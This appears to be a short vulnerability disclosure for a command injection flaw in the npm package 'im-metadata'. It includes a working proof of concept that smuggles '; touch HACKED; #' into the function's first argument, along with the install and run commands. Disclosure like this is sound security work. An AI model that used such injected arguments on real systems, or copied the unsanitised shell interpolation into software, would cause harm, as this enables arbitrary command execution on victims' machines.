This vulnerability allows an attacker to execute arbitrary commands remotely on the victim's machine. The issue occurs because user input is formatted into a command string that is then executed without any check.
```javascript
// poc.js
var metadata = require("im-metadata");
// The first argument is interpolated into a shell command string, so the
// "; touch HACKED; #" part runs as a separate command.
metadata("test; touch HACKED; #", {}, function () {});
```
```sh
npm i im-metadata # Install affected module
node poc.js # Run the PoC
```

A file named `HACKED` has been created :)